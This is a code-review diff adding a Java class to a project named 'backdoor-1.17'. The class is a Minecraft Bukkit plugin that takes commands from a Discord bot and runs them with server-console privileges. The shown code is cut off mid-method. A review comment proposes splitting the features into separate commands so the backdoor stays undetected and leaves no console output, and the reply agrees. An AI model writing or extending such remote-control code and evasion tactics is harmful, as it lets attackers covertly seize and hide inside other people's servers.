backdoor-1.17/src/main/java/me/tsb/discordBot/commands/RunCommand.java

```diff
@@ -0,0 +1,32 @@
+package me.tsb.discordBot.commands;
+
+import net.dv8tion.jda.api.events.message.MessageReceivedEvent;
+import org.bukkit.Bukkit;
+import org.bukkit.command.ConsoleCommandSender;
+
+import java.awt.*;
+
+public class RunCommand {
+
+    public RunCommand(MessageReceivedEvent event, String[] args)
+    {
+        String title = "Run Command";
+        String description = "Run command as console";
+        String[] fields = null;
+        String footer = "Made by BackdoorBot";
+
+       try {
+            String command = "";
+            ConsoleCommandSender console = Bukkit.getServer().getConsoleSender();
+            for (int i = 1; i < args.length; i++)
+                command += args[i] + " ";
+            Bukkit.dispatchCommand(console, "say hello");
```

Comment:
imo having separate commands to do all things that minecraft can would help with being undetected, not having to worry about console output

Reply:
ill look into it